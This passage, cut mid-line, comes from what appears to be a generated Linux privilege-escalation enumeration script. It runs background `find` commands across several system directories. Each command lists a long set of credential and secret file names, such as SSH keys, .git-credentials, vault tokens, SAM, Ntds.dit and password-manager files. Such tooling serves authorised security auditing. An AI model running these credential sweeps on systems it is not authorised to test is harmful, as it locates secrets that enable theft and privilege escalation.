\"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_PRIVATE=`eval_bckgrd "find /private -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"agent*\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \"sess_*\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_RUN=`eval_bckgrd "find /run -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SBIN=`eval_bckgrd "find /sbin -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SNAP=`eval_bckgrd "find /snap -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SRV=`eval_bckgrd "find /srv -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SYS=`eval_bckgrd "find /sys -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SYSTEM=`eval_bckgrd "find /system -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SYSTEMD=`eval_bckgrd "find /systemd -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_TMP=`eval_bckgrd "find /tmp -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name 